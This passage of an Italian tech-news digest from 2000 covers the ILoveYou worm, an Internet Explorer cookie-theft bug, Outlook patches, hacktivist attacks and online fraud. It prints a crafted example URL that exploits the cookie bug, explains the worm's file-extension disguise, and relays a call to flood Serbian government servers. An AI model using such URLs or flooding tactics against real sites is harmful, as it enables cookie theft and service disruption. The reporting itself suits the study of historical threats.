non basta lavorare sulle tecnologie di filtro dei pacchetti. L'esperto 
ha spiegato che la sua analisi di Mstream si basa sul ritrovamento dello 
stesso in un computer Linux di una grande universit il mese scorso. 
Quel server, ha detto, attaccava 12 siti web contemporaneamente. 
Secondo Dittrich l'analisi di Mstream deve ancora essere completata ma 
l'allarme  stato lanciato perch il codice  arrivato sulla mailing list
di sicurezza Bugtraq e potrebbe diffondersi rapidamente sulla rete.




+--< Tutti dicono I LOVE YOU >--+ ]05/05/2000[ Virus ]

Sembra che i creatori di virus non si fermino pi nemmeno difronte 
ai sentimenti. "ILoveYou", riporta il soggetto dell'infame lettera,
ma dietro vi si cela un tradizionalissimo virus da e-mail, scritto 
in VBScript e capace di auto-replicarsi attraverso l'invio di 
messaggi a tutti i nominativi della rubrica di Outlook e di mIRC. 
All'interno di queste e-mail si trova il messaggio "kindly check 
the attached LOVELETTER coming from me." e in allegato il file 
"LOVE-LETTER-FOR-YOU.TXT.vbs" che, se aperto, infetta il sistema. 
Ma la cosa che pi colpisce  la rapidit del tutto senza precedenti 
con sui il codice si va diffondendo sulla rete.
La tecnica utilizzata da questo virus  quella gi vista in altri 
trojan tipo Melissa o Happy 99, con la differenza che, per ingannare 
meglio anche gli utenti pi smaliziati, il creatore ha utilizzato un 
artificio gi adottato dal virus VBS/Freelink, un noto "worm" 
diffusosi qualche tempo fa soprattutto via IRC. In pratica la vera 
estensione del file, in questo caso .vbs (ma poteva essere .pif, 
.msc od un qualsiasi altro formato eseguibile di Windows), viene 
celata dietro ad un'estensione "non sospetta", come .txt, .jpg o 
.avi, l'unica visibile dall'utente. Questo  reso possibile dal 
fatto che in Windows esiste l'opzione "Nascondi le estensioni dei 
file per i tipi di file conosciuti" abilitata di default. Per 
disattivarla baster andare in Gestione Risorse/Opzioni 
Cartella/Visualizzazione e levare il segno di spunta sulla relativa 
voce. In questo modo sar immediatamente possibile accertarsi che i 
file pervenutici attraverso la posta elettronica, IRC o qualsiasi 
altro servizio di Internet, siano effettivamente quello che "dicono 
di essere"... In mIRC, invece, sarebbe prudente aggiungere in 
File/Options/DCC/Folders tutte le estensioni tipiche dei worm script
nella casella "Ignore file types": in questo modo il programma 
rifiuter a priori la ricezione di file sospetti provenienti da 
altri utenti. Oltre a replicarsi via e-mail, LoveLet si preoccupa di
rinominare i file .mp3, .jpg ed altri tipi ancora in .vbs in cui 
infila il virus. Inoltre tenta di scaricare un file .EXE da quattro 
siti Internet... Solitamente i programmi scritti in VBS funzionano 
solo sui sistemi Windows 98/2000, ma divengono vulnerabili anche 
Windows 95 ed NT4 nel caso vi sia installato Internet Explorer 5. 
Pare che non corrano rischi, invece, coloro che hanno disabilitato 
gli Windows Script Host o applicato le recenti security patch di 
Microsoft. Le prime a lanciare l'allarme sono state due societ 
inglesi di prodotti per la sicurezza, GFI e Sophos, che hanno 
battezzato il nuovo virus con il nome "VBS/LoveLet-A", ma che altri 
chiamano "VBS/LoveLetter", definendone anche un'origine abbastanza 
certa: le Filippine. Dopo aver gi messo in ginocchio alcune grosse 
aziende londinesi, fra cui una con 7mila dipendenti, LoveLet ha 
rapidamente raggiuno il resto dell'Europa e, proprio in questi giorni,
anche l'Italia. Ne abbiamo avuto conferma dalle numerose mail 
contenenti il famigerato soggetto "ILOVEYOU" che sono pervenute ieri
in redazione. Sembra che la velocit di diffusione di LoveLet sia 
superiore persino a quella di Melissa e purtroppo, da quello che 
possiamo vedere, anche qui in Italia non mancher di espandersi a 
macchia d'olio. Fortunatamente proprio in queste ore praticamente
tutti i maggiori produttori di antivirus hanno annunciato la 
disponibilit di nuovi aggiornamenti in grado di riconoscere il 
pericolo. A onor di cronaca bisogna dire che uno dei primi 
antivirus ad essere stati aggiornati  il gratuito Inoculate 
Personal Edition di Computer Associates.

+--< Playstation 2 tricolore >--+ ]12/05/2000[ Games ]

Il 26 ottobre la Playstation 2 sbarca in USA ed in Europa, due 
continenti che finora si sono dovuti accontentare solo delle 
foto sui giornali o di qualche costosissimo modello sfuggito 
alle maglie delle dogane giapponesi.
Considerando che la console offre un lettore DVD/CD integrato 
e la possibilit quindi di vedere i film sulla TV, il prezzo 
di vendita di 600 mila lire (299$ in USA) risulta davvero aggressivo.
Dopo il clamoroso successo che anche qui in Italia aveva riscosso 
la vecchia Playstation, Sony  molto fiduciosa nelle previsioni 
di vendita, anche se i pi maliziosi affermano che, specie qui 
in Europa il grosso boom lo si ebbe anche grazie all'estrema 
facilit con cui si potevano copiare i giochi. Vedremo...
Nel frattempo Sega, partita con circa un annetto di vantaggio, 
tenta ora di contrastarne l'avanzata trionfale, applicando una 
lenta ma progressiva diminuzione del prezzo del suo Dreamcast: 
l'attuale sconto  di 50$.
Il prossimo anno Sony si trover ad affrontare anche altri due 
temibili concorrenti: Microsoft, con X-Box, e Nintendo con Dolphin. 
Probabilmente alla fine del 2001 una console coster quanto un tostapane.


+--< Internet Explorer, cookies a rischio >--+ ]15/05/2000[ Bug ]

Basta modificare una URL per impedire al browser Microsoft Internet 
Explorer di compiere i suoi check di sicurezza e appropiarsi dei contenuti
dei cookies piazzati sui computer degli utenti internet. Questo il nuovo 
bug emerso nelle ultime ore che sta creando non pochi problemi a Microsoft,
vista anche l'altissima diffusione dei cookies. Come noto, i cookies 
consentono ai siti web di "riconoscere" gli utenti quando tornano su certe
pagine offrendo cos numerose possibilit di "personalizzazione". 
Intercettare un cookie, dunque, pu dare accesso ad una serie di 
informazioni personali sull'utente vittima.
Ad allertare del nuovo baco  stato il solito Bennett Haselton di 
Peacefire che ha pubblicato una spiegazione del bug sul quale Microsoft ha
gi fatto sapere che sta lavorando.
L'azienda ha comunque sottolineato che il bug non consente ad un eventuale
cracker male intenzionato di impossessarsi di tutti i cookies di un utente,
ma soltanto di intercettare, in certe condizioni, il cookie di utente e 
perch questo accada, inoltre, "l'utente vittima" deve recarsi su pagine 
web costruite "ad hoc" per sfruttare il baco. In una nota, Microsoft ha 
comunque ammesso che "questa vulnerabilit consentirebbe ad un sito web di
leggere, modificare o cambiare i cookies che riguardano altri siti. 
Dovremmo rilasciare una patch in tempi brevi".
Ma vediamo in cosa consiste il baco e come pu essere "sfruttato". Il dato
essenziale  che Explorer rilascia le informazioni presenti in un cookie 
soltanto al sito che in origine ha creato e inviato il cookie sul computer
dell'utente. Per accertarsi che il sito sia "quello giusto", Explorer 
controlla che il dominio del cookie e quello del sito siano corrispondenti.
A fronte di una lunga URL, Explorer controlla tutto quello che c' nella 
URL prima del primo slash, cosicch legge "punto-informatico.it" anche se 
la URL  "punto-informatico.it/standby".
Il baco si rivela utilizzando, al posto dello "slash" in una URL costruita
apposta, il simbolo "%2f", una alternativa che il browser per non 
considera slash quando fa il controllo sui cookies. Questo significa che 
una URL contenente quei caratteri al posto dello slash pu ingannare il 
browser, nascondendo il dominio del sito attaccante e inserendo uno slash 
solo alla fine della URL di attacco. Per fare un esempio, una URL come 
www.peacefire.org%2fsecurity%2fiecookies%2fshowcookie.html%3F.amazon.com/
viene riconosciuta dal browser come appartenente al dominio Amazon.com. 
Questo significa che a questo sito, che nulla ha a che vedere con Amazon, 
Explorer rilascia i dati contenuti nel cookie che l'utente vittima ha 
ricevuto quando ha visitato Amazon. E nel cookie possono essere archiviati
anche dati molto delicati... "In questo modo, ha spiegato Haselton, il tuo
nome o il tuo indirizzo di posta elettronica, piuttosto che i libri che hai
comprato online, possono essere individuati da un sito attaccante. 
Qualsiasi sito che utilizza i cookie per l'autenticazione pu essere 
colpito". 
Per "salvarsi" occorre disabilitare JavaScript da Explorer. 
Gli utenti di Netscape non hanno, invece, nulla da temere.


+--< Plug-in per Outlook >--+ ]17/05/2000[ Virus ]

Dopo il pandemonio scatenato dal worm ILoveYou Microsoft sembra essersi
convinta che forse  giunta l'ora di rivedere un paio di cosette 
riguardanti Outlook. Le critiche che maggiormente sono state rivolte 
al software riguardavano soprattutto l'esecuzione automatica degli 
attachment, una funzione che sebbene possa far risparmiare un paio di 
click, di questi tempi si rivela assai rischiosa.
La patch per Outlook 98/2000, disponibile presso il sito di Microsoft 
a partire dalla prossima settimana, disabilita proprio il lancio in 
automatico degli allegati di posta elettronica "eseguibili", come ad 
esempio .vbs, la tipica estensione dei file scritti in Visual Basic 
Script, il linguaggio attualmente pi in voga presso gli autori di 
worm virus. La patch mette fine anche ad un'altra debolezza di Outlook 
molto sfruttata dai virus che si diffondono via e-mail: la possibilit
che un qualsiasi programma possa accedere in modo trasparente alla 
rubrica e inviare mail agli indirizzi ivi contenuti. D'ora in avanti,
l'utente sar sempre avvertito in modo da poter decidere se avallare 
l'operazione oppure bloccarla. Microsoft ha ammesso di essere sempre
alla ricerca del giusto compromesso fra potenza, flessibilit e 
sicurezza, ma la bilancia non sembra per la verit tarata a dovere. 
Queste piccole modifiche apportate dalla patch potevano essere 
applicate molto prima, fin dai tempi della diffusione di worm 
dilaganti come Happy99 o Melissa: i segnali premonitori di un'altra
epidemia di massa come quella causata da ILoveYou c'erano tutti e 
le responsabilit, come giustamente hanno fatto notare molti lettori,
non possono certo essere imputate unicamente agli utenti.


+--< Netstrike contro Milosevic e le sue TV >--+ ]19/05/2000[ Hacktivism ]

L'incredibile appello lanciato a tutti i navigatori  chiaro e tondo: 
mettere in crisi i server del regime serbo di Slobodan Milosevic, che 
nelle ultime ore ha dato vita ad una massiccia repressione dei mezzi di 
informazione dell'opposizione democratica. E farlo non tanto per "dare 
fastidio" quanto invece per esprimere solidariet a chi, in Serbia, si 
batte contro il regime liberticida. 
Sulle mailing list di ECN.org si va organizzando un netstrike, ovvero 
una "incursione" di navigatori, tanti e abbastanza per mandare in tilt i 
siti del regime. Una decisione, quella di diffondere l'appello per il 
netstrike, nata dall'atmosfera che si respira online, un'atmosfera 
tesissima che sembra preannunciare, per i prossimi giorni, sanguinosi 
scontri per le strade di Belgrado.
L'idea del netstrike  di navigare per un'ora tutti i giorni, tra le 20 
e le 21 sui siti da colpire e in particolare: il sito del Governo 
jugoslavo, quello del ministero dell'Interno, del ministero 
dell'informazione e dell'SPS, il partito di Milosevic. C' chi suggerisce 
di concentrare "le proprie forze" sul solo server del Ministero 
dell'informazione, "sito centrale della propaganda di regime": 
http://www.serbia-info.com/.
E' forse importante spendere due parole per chiarire a quanti intendessero
partecipare al Netsrike che si tratta di un'operazione politica e 
aggressiva che mira a mettere fuori servizio servizi di altri, non  
un'azione pacifica o l'equivalente virtuale di una manifestazione 
cittadina, come ha sostenuto qualcuno. 
L'appuntamento, comunque,  per le 20, ora nella quale si tengono i 
telegiornali di regime, e quindi ora "calda", per manifestare il dissenso 
verso la politica repressiva e la solidariet all'opposizione democratica. 
Per seguire l'opposione ci sono vari canali. Due siti, 
http://www.otpor.com/ e http://www.freeb92.net/, il canale IRC b92 
(server irc.opennet.org) dove pare si parli serbo, inglese e 
occasionalmente italiano.


+--< Hacker nella pubblica amministrazione? >--+ ]24/05/2000[ Cyberwar ]

"Se non puoi batterli, unisciti a loro":  forse seguendo questo 
vecchio adagio che l'Aipa, l'autorit che ha il compito d'informatizzare
la pubblica amministrazione, ha reso di noto di stare prendendo in 
considerazione l'ipotesi di assumere degli hacker, al fine di testare 
la resistenza agli attacchi la rete unitaria della pubblica amministrazione.
Da un po' di tempo, da parte dell'amministrazione pubblica si sono 
susseguite diverse pregevoli iniziative in Rete, in testa quella di 
poter bypassare le code allo sportello per il ritiro, la consegna e 
il relativo pagamento di Unico, il modulo per la dichiarazione dei 
redditi.  poi di oggi la notizia che tutti i dipendenti pubblici 
avranno la loro firma digitale, mediante la quale potranno autenticare,
in forma elettronica, in documenti (le Poste Italiane sono invece, da 
poco, autorit per il rilascio di firma digitale). Per le aziende private 
che operano in Internet, utilizzare hacker per testare la sicurezza delle
Reti, ed eventualmente organizzare delle valide difese  una pratica 
abbastanza comune.


+--< Hackers: contro Metallica e Dr.Dre >--+ ]31/05/2000[ Hacktivism ]

Volevano protestare contro le iniziative antipirateria dei Metallica e di 
Dr.Dre e per farlo hanno attaccato i server web della metropolitana di 
Washington. Hanno tirato gi il sito e per alcune ore, almeno cinque, 
hanno lasciato una home page modificata contenente, pare, testi a luci 
rosse e slogan contro i musicisti che hanno preso di mira Napster, la 
celebre "community" che consente ai suoi utenti di scambiarsi file musicali.
Gli hacker si sono identificati come "Idk2k" e come "immortal daemon killers",
aprendo con questa dichiarazione nella home page modificata: "benvenuti 
nell'anno della conoscenza". Da quanto hanno scritto, pare considerino 
cosa di poco conto l'hacking di un sito, dando invece molto rilievo al 
fatto che l'attacco era "necessario" per protestare contro le denunce 
antiNapster di Metallica e Dr.Dre. I responsabili del sito hanno dichiarato 
di aver trasmesso i dati in loro possesso alle autorit investigative e 
hanno affermato: "Tutto sommato  anche un bene che questi eventi accadano
di quanto in quando. Non che siano piacevoli, ma consentono di imparare e
ti spingono a prepararti per difenderti".


+--< Ora la pirateria online  sui film >--+ ]01/06/2000[ Pirateria ]

Con qualche ora di connessione e un po ' di pazienza per trovare il 
titolo giusto  possibile scaricare dalla rete interi film con una 
qualit accettabile, anche lungometraggi che si trovano ancora nei 
cinema: questo il fenomeno indagato dal quotidiano americano USA Today
che ha dimostrato che in circa otto-dieci ore si pu entrare in 
possesso di copie pirata di film come "Il Gladiatore" o "American Beauty".
Come? Il meccanismo, gi previsto e descritto su queste e altre pagine, 
 quello ormai messo a punto da siti come Scour.com o iMesh che offrono
software di "community" e di scambio file. A differenza di Napster, 
attaccato dall'industria discografica, i nuovi sistemi consentono di 
scambiare qualsiasi genere di file, film digitalizzati compresi.
Fino a qualche settimana fa si parlava del giro di copie digitali di 
film ma era ben pi difficile trovare materiale da scaricare e gli 
stessi software di Scour o iMesh non sembravano abbastanza stabili e 
solidi da consentire un utilizzo semplice e facile a moltitudini di 
utenti. Ora le cose vanno cambiando e tutto ci che serve, a chi  
determinato nel procurarsi una copia di un film,  solo il tempo di 
farlo. Intervistato da USA Today dopo l'inchiesta, il produttore de 
"Il Gladiatore", Douglas Wick, ha affermato: "La cosa mi fa vomitare.
Uno passa moltissime ore a cercare di creare una experience di valore
per l'audience. L'idea che una copia mal fatta e non autorizzata sia
diffusa e vista su piccolo schermo  decisamente deprimente". Jack 
Valenti, presidente della MPAA, l'associazione che raccoglie 
l'industria di Hollywood, ha gi dichiarato che "siamo determinati 
a perseguire qualsiasi azienda renda disponibile illegalmente copie 
dei nostri film". E Scour mette in guardia i contraffattori, 
sottolineando i propri accordi con la societ di produzione Miramax, 
tesi alla realizzazione di un sistema di distribuzione online dei 
film. Mentre iMesh si dichiara pronta ad agire in caso di 
segnalazioni di copie illegali e ricorda che, proprio come Scour, 
la propria policy esplicitata sul sito vieta qualsiasi uso illegale 
del sistemone.


+--< Hackertronics: chiamate cellulari gratis >--+ ]13/06/2000[ Technology ]

Esiste da un po ', ma ultimamente ha rincarato la dose annunciando nuovi 
prodottini di cracking con cui rischia di fare l'ein plein a spese degli 
operatori GSM. Hackertronics.com  uno dei pi sfacciati negozi online che 
vendono programmi illegali per crackers in erba o scriptkiddies ma anche 
sistemoni per frodare i gestori della telefonia mobile e utilizzare il 
cellulare gratuitamente... Il tutto venduto via web con l'accettazione di 
pagamenti effettuati con tutte le maggiori carte di credito, oltre che con 
bonifici, assegni e via elencando. Cinque "i settori" coperti dai sistemini 
di Hacketronics, per nulla economici ma, se si accetta quanto scritto sul 
sito, "garantiti": Phone Phreaking & GSM Hacking Devices and Software (ovvero
sistemi per ottenere ricariche gratis per il cellulare o per utilizzare a 
sbafo le linee telefoniche); Financial Hacking Devices; Cracking & Lockpicking
Tools, Devices and Secrets; Surveillance and Countermeasure Devices (007 e 
affini); Unusual weaponry and stun devices. Pare che i gestori del sito stiano
ottenendo un discreto successo vendendo quella che potrebbe apparire una 
bufala e che chiamano "GSM Prepaid Free Calls Kit", un device e un software 
che, a sentire Hacketronics, permette di ricaricare la propria scheda 
telefonica a spese dei gestori telefonici, anche quelli italiani. 
Permetterebbe altres di creare schede gratuite "a scadenza" da vendere a 
terzi, per creare un vero e proprio mercato nero... Ecco la presentazione del
kit: "Finalmente  arrivato. Hackertronics.com ha commissionato ad un gruppo 
di hacker la creazione di software e hardware per rendere facile a tutti 
l'effettuazione di chiamate gratis via GSM. Dopo un anno il prodotto  stato 
realizzato ed  il pi avanzato sul mercato. Si possono fare telefonate da 
GSM senza dover mai pi ricaricare il cellulare. Basta usare il kit e 
continuare ad aggiornare il software con i nuovi codici di bypass. Si possono
anche creare carte per chiamate gratuite da regalare ad altri, bastano dieci 
minuti. Si possono anche fare carte gratuite che durano solo un giorno, una 
settimana o un mese. Quindi si possono vendere e costringere chi le compra a 
richiederne di nuove dopo un certo periodo di tempo. Cos si fanno pi soldi".
Affermano i cracker del sito: "Il nostro kit utilizza un metodo noto come 
Algorithm Triangulation che individua i buchi di sicurezza nelle card GSM 
utilizzate, in modo tale che quando si chiama, il sistema dell'operatore 
telefonico non pu togliere dalla scheda la spesa effettuata per la telefonata
Si pu quindi chiamare senza limiti. Il kit  garantito per 12 mesi!".


+--< I nuovi mafiosi alle prese con la new economy  >--+ ]13/06/2000[ 
   Cyberwar ]

Le prime pagine di tutti i quotidiani sono dedicate alla notizia della 
maxitruffa, organizzata a Wall Street da alcuni clan mafiosi newyorkesi, che 
ha portato allarresto di oltre 120 persone, tra cui molti broker, il 
presidente e lamministratore delegato di una catena di fast food e dieci 
esponenti di Cosa Nostra. Le famiglie controllavano segretamente numerose 
societ di brokeraggio ha spiegato il procuratore Mary Jo White, che ha 
coordinato la maxiretata attraverso le quali eseguivano vaste operazioni di 
acquisto di titoli, in violazione alle regole della Sec, lorganismo di 
controllo della Borsa. I reati sarebbero stati compiuti tra il 95 e il 99 e
a questo scopo le cinque grandi famiglie della mafia newyorkese avrebbero 
formato un sodalizio. In questa circostanza i nuovi mafiosi hanno mostrato di
avere una grande dimestichezza con la new economy. La maxitruffa, infatti, 
comportava la promozione di societ e azioni che essi spacciavano per 
dot-com al fine di indurre gli investitori a capitalizzare sul boom di 
Internet.
Sul Corriere della Sera unintervista a Richard Martin. Il detective di Pizza
Connection(lo scandalo di mafia e droga pi clamoroso degli anni Ottanta) 
rivela che in realt Cosa Nostra continua a fare uso degli stessi metodi, 
estorsione, corruzione e racket, ma ha anche imparato a sfruttare la Rete per
le sue attivit criminali. Internet lascia spazio a chi si dedica al gioco 
del pump and dump. Un termine del gergo di Internet che indica linnalzamento
forzato del valore azionario allo scopo di venderlo improvvisamente intascando
miliardi. E un metodo classico del mercato, soprattutto nelle-commerce, 
dove  pi facile diffondere voci false sui buoni o cattivi risultati di una 
compagnia.


+--< SilentRunner, software spione >--+ ]16/06/2000[ Privacy ]

SilentRunner, il cui nome  gi tutto un programma,  un software sviluppato 
da una societ che bazzica dalle parti della difesa americana e che  in grado
di analizzare, all'insaputa degli utenti, il traffico di una rete aziendale 
alla ricerca di parole o frasi sospette ed eventuali backdoor che possano 
essere sfruttate da hacker o impiegati interni all'azienda per divulgare 
informazioni riservate. I risultati delle analisi vengono poi visualizzati 
attraverso grafici 2D e 3D.
Il produttore del software, Raytheon, ha affermato che SilentRunner nasce in 
risposta ad una crescente esigenza delle aziende che ogni anno vedono 
aumentare i danni derivanti dallo spionaggio industriale e della rivendita di
informazioni segrete da parte dei propri impiegati. Sempre secondo Raytheon 
il pregio del suo software, che ha un costo che si aggira fra i 25.000 ed i 
65.000 dollari,  quello di evitare controlli intrusivi nei singoli file o 
nelle singole e-mail dei dipendenti, riuscendo a carpire tutte le informazioni
necessarie direttamente dal flusso di dati
che passano attraverso la rete. Naturalmente restano da vedere le implicazioni
sulla privacy: chi pu garantire i dipendenti di un'azienda che faccia uso di
un tale software, riguardo alla legittimit dei controlli realmente 
effettuati?


+--< Il lato oscuro dell'elettronica >--+ ]16/06/2000[ Technology ]

Sei milioni di tonnellate: questo il peso di un anno di rifiuti elettronici 
all'interno dell'Unione Europea. Questa "massa" di materiale altamente 
inquinante oggi mette a rischio, pi di altri generi di scarti, il gi 
dissestato ambiente europeo. Ed  questo il problemone che la Commissione 
europea spera di riuscire a risolvere nel volgere di... qualche lustro. Se 
tutto va per il meglio, cio se non saranno posti troppi ostacoli su questa 
strada, nel giro di un anno e mezzo potrebbe entrare in vigore una norma 
comunitaria che consentirebbe il riciclaggio,a partire dal 2006, di un volume
tra il 60 e l'80 per cento della massa di rifiuti a rischio. Oggi gli scarti 
elettronici costituiscono il 4 per cento del totale dei rifiuti prodotti dai 
paesi UE. Entro la fine della decade questa percentuale potrebbe scendere 
anche all'1 per cento, quantit comunque corrispondente a centinaia di 
migliaia di tonnellate di rifiuti ad alto rischio non trattati.
Va sottolineato inoltre che, anche se la normativa entrer in vigore, i 
costruttori potranno continuare ad usare liberamente piombo, cadmio e 
mercurio almeno fino al 2008.


+--< Visa, MasterCard bloccano le smart card? >--+ ]19/06/2000[ Antitrust ]

Gli stretti rapporti tra Visa e MasterCard sono finiti nel mirino 
dell'Antitrust americano e ora vengono ritenuti da molti operatori 
ed esperti responsabili della scarsa adozione delle smart card nei sistemi 
statunitensi. Senza mezze parole, c' chi accusa le due aziende di aver voluto
impedire la diffusione dei nuovi sistemi, che avrebbero potuto favorire la 
concorrenza ai due colossi del settore.
A tentare di "rompere" quello che alcuni considerano un "fronte illegittimo" 
ci ha provato l'anno scorso la superconcorrente American Express lanciando 
Blue, una card "intelligente" dotata di microchip pensata sia come carta di 
credito che come card per transazioni elettroniche pi sicure. Ma, secondo 
gli esperti, non ci sono speranze di una vera diffusione di questa e altre 
offerte senza l'appoggio delle banche. Stando a Rob Enderle, del Giga 
Information Group: "dal momento che Visa e MasterCard sono le piattaforme 
dominanti, le banche non hanno interesse a installare lettori di smart card o
realizzare infrastrutture specifiche senza quelle carte di credito. Questo 
mette le smart card in un angolo, poich le aziende dominanti non hanno spinto
per la loro adozione".
Ma, a parte queste e altre accuse, Visa e MasterCard devono pensare a 
difendersi nella causa intentata dal ministero della Giustizia, convinto 
dell'esistenza di una situazione di "cartello monopolistico" nel settore 
dalle due aziende.


+--< Gli Iron Maiden puntano sul CD scomodo >--+ ]19/06/2000[ Pirateria ]

L'idea  semplice e "suicida": controbattere chi scarica con un clic 
interi brani musicali dalla rete, con l'offerta di un Compact Disc che 
non pu essere letto su player CD normali e deve essere "sbloccato" 
utilizzando il personal computer. Questa la "geniale trovata" della band 
degli Iron Maiden, gruppo storico dell'heavy metal.
Il progetto, che coinvolge addirittura 2 milioni di copie CD del nuovo 
album degli Iron Maiden,  un tentativo di legare in modo indissolubile 
il pagamento dei diritti d'autore all'ascolto della musica registrata sul 
CD. Per riuscire a "fare breccia" nel cuore dei fan, alcune migliaia di CD
sono stati regalati ai convenuti all'ultimo concerto degli Iron Maiden in 
Gran Bretagna.
Per ascoltare le tracce e visualizzare i contenuti multimediali registrati
nel CD, gli utenti dovranno utilizzare il personal computer per "sbloccare"
il disco, protetto da una chiave e da un formato proprietario di 
registrazione che sfrutta le tecnologie DRM. Proprio a causa di questo 
formato, i lettori tradizionali di CD non leggono il disco che pu, 
quindi, essere ascoltato solo con il computer.
Pare che Napster, il sistemone scambia-musica online accusato di tutto e 
di pi, ora sorrida.


+--< CyberWAR: sotto attacco i computer americani >--+ ]21/06/2000[ Cyberwar ]

Washington (USA) - "Si rischia una Pearl Harbor informatica, un disastro 
senza precedenti": con queste parole un altissimo funzionario 
dell'amministrazione Clinton ha "terrorizzato" Congresso e media americani,
parlando delle nuove scoperte della "difesa informatica".
Secondo Richard Clarke, che coordina il Consiglio per la sicurezza delle 
infrastrutture e l'antiterrorismo, "non siamo pi di fronte ad una 
minaccia teorica ma ad un dato di fatto". Il pericolo, per gli States, 
non  dato soltanto dal fatto di avere numerosi nemici grandi e piccoli 
nel mondo ma di dipendere anche in modo massiccio dalle infrastrutture di 
telecomunicazione. Sono anni che lo stesso Clarke avverte di un possibile,
disastroso "Pearl Harbor" informatico.
Lo scenario  decisamente preoccupante. Il gruppo di Clarke,  stato detto,
ha rilevato che diversi paesi sono impegnati "in un tracciamento 
elettronico delle reti informative infrastrutturali degli Stati Uniti. 
Stanno cercando modi per aggredire i network americani in periodo di 
guerra".
Sebbene non siano stati nominati i paesi, da pi parti si parla della 
Corea del Nord e gi in passato i vertici della CIA avevano avvertito il 
Congresso delle operazioni di "information warfare" attive in Russia e 
Cina.
Come noto, da tempo gli USA si preparano a quella che definiscono "guerra 
dell'informazione", prevedendo anche la possibilit di attaccare "i 
sistemi nemici", oltre che difendersi. Secondo Clarke i pericoli sono 
molti: "Immaginate uno scenario nel quale le citt hanno perso il 
controllo dell'energia e dei telefoni, in cui i gasdotti saltano in tutto
il paese e i treni deragliano. Dopo un attacco del genere molti vorranno 
sopprimere le libert civili... Non so se prima di Pearl Harbor un 
aereo-spia ogni giorno passasse a verificare le condizioni dell'obiettivo.
Ma so che se ci fosse stato e lo avessimo saputo, qualcosa di preventivo 
si sarebbe potuto fare. Oggi abbiamo l'equivalente di aerei-spia nemici 
che sorvolano il loro obiettivo tracciando le nostre reti".
"Non posso capire - ha attaccato Clarke - come sia possibile che un paese 
come il nostro veda quanto sta accadendo e non reagisca".


+--< Linux, KDE e Gnome si danno la mano >--+ ]21/06/2000[ Linux ]

E ' stato un po ' il sogno di tutti gli utenti Linux vedere i due gruppi 
di sviluppo di Gnome e KDE stringersi la mano e venirsi in contro 
vicendevolmente: fino a ieri questo per era, per l'appunto, solo un sogno.
Oggi, grazie all'interessamento di alcuni noti sviluppatori open source, 
un tale evento non sembra pi cos lontano. Pare infatti che Rivyn sia 
riuscito nell'intento di mettere in contatto due anziani programmatori di 
entrambi i gruppi di sviluppo e li abbia fatti ragionare su di un punto: 
sviluppare congiuntamente un'architettura comune di componenti compatibile
con entrambi gli ambienti, KDE e Gnome.
Se gli ingranaggi di un simile progetto dovessero davvero mettersi in moto,
questo potrebbe comportare la fusione delle due architetture per la 
riusabilit dei componenti: la Bonobo di Gnome e la Kparts di KDE. 
Per il momento queste sono solo voci, peraltro non confermate, e pertanto 
 meglio prendere la storia con estrema cautela, ma se davvero le 
intenzioni fossero quelle qui menzionate, il timore che KDE e Gnome 
finiscano per divenire totalmente incompatibili fra loro potrebbe essere 
definitivamente allontanato.


+--< Il CERT tira ancora le Microsoft-orecchie >--+ ]22/06/2000[ Bug ]

Non si pu dire che gli esperti del CERT (Computer Emergency Response Team) e 
Microsoft vadano d'amore e d'accordo: qualcuno sarcasticamente sostiene che, 
semplicemente, hanno due visioni del mondo contrapposte. Questa volta sulla 
graticola del CERT  finita una patch recentemente rilasciata da Microsoft 
con l'intenzione di mettere fine ad un buco di sicurezza trovato nel sistema 
di Windows Help installato con Internet Explorer. In pratica grazie a questo 
bug, e sotto certe condizioni, un hacker potrebbe essere in grado di eseguire,
da una locazione remota, dei file di help maliziosi sul server che gli 
garantirebbero l'accesso totale al sistema. Secondo il CERT, la patch con cui 
Microsoft avrebbe risolto il problema in realt lascia aperte ancora alcune 
altre strade che, sebbene pi complesse da percorrere, per certi siti 
continuano
a rappresentare vulnerabilit inaccettabili. Microsoft replica sostenendo che 
la sua patch fa esattamente quello che deve fare: limita l'esecuzione dei file
di help ai soli amministratori locali, bloccando qualsiasi altro accesso da 
remoto. 
Sempre secondo la casa di Gates baster applicare le regole di sicurezza di 
base per prevenire incidenti. Chi riveste il ruolo di amministratore di 
sistema far comunque meglio a dare un'occhiata all'avviso del CERT e alle 
istruzioni su come eliminare totalmente ogni rischio residuo.


+--< Quel computer  un cervello! >--+ ]23/06/2000[ Technology ]

Negli anni '60 lo chiamavano, sotto l'influenza degli autori di libri di 
fantascienza, "cervello elettronico"; oggi il computer  divenuto un 
elettrodomestico di uso comune e ha perso quell'alone di mistero che lo 
circondava sono una decina di anni fa. 
Eppure, a ben vedere, i computer sembrano destinati ad avvicinarsi sempre
pi a quel primo appellativo, "cervello elettronico", per raggiungere 
nuovi "traguardi". A spingere la ricerca verso computer sempre pi 
"intelligenti" e "umani"  proprio il MIT, baluardo tecnologico per 
eccellenza, che ha annunciato l'avvio di un ambizioso progetto, Oxygen, 
e la messa a punto di un nuovo circuito elettronico in grado di simulare 
le attivit cerebrali.
Quello creato dal MIT  il primo circuito elettronico ibrido 
analogico/digitale che in pratica fonde insieme campi quali la 
neurobiologia e la progettazione di computer dando vita ad una nuova 
branca dell'ingegneria denominata "neuromorfica".
Il chip  stato costruito partendo da normali transistor sistemati in 
una rete ad anello formata da 16 neuroni artificiali connessi fra loro 
da sinapsi. Ogni neurone  connesso ad altri 4 neuroni e ad un nucleo che
 ha il compito di regolare le reazioni e sopprimere gli impulsi 
considerati "rumore" fornendo delle priorit:  un po ' come quando pi 
persone attorno a noi ci parlano e noi riusciamo a focalizzare la nostra 
attenzione solo su una di loro, quella che in quel momento gode del 
nostro interesse.
Nonostante possa suonare tutto molto complesso, Rahul Sarpeshkar, 
professore al MIT, afferma che questo approccio risulta di gran lunga 
pi semplice se comparato a quello dei tradizionali circuiti neurali; 
semplice, ma estremamente efficace.
Biologia e computer sembra un connubio destinato a segnare il futuro 
delle macchine, che, se anche non somiglieranno affatto a quelle 
descritte nei libri di fantascienza, potrebbero davvero essere in grado
di mascherare, almeno in parte, il loro cuore di latta.
Sempre dal MIT arriva notizia dell'avvio di Oxygen, un progettone che 
coinvolge alcuni grandi nomi, fra cui HP, Nokia e Philips, per lo 
sviluppo di una nuova generazione di computer e info appliance in grado 
di servire al meglio l'uomo attraverso forme di intelligenza artificiale
e con lo sfruttamento massiccio delle reti a mezzo di connessioni 
wireless.
Gli scienziati del MIT sostengono che dopo 40 anni in cui  stato l'uomo
a provvedere ai computer,  ora il tempo che siano i computer a 
provvedere ai bisogni umani. Un obiettivo da brivido, in tutti i sensi,
per raggiungere il quale le sei societ coinvolte nel progetto stanno 
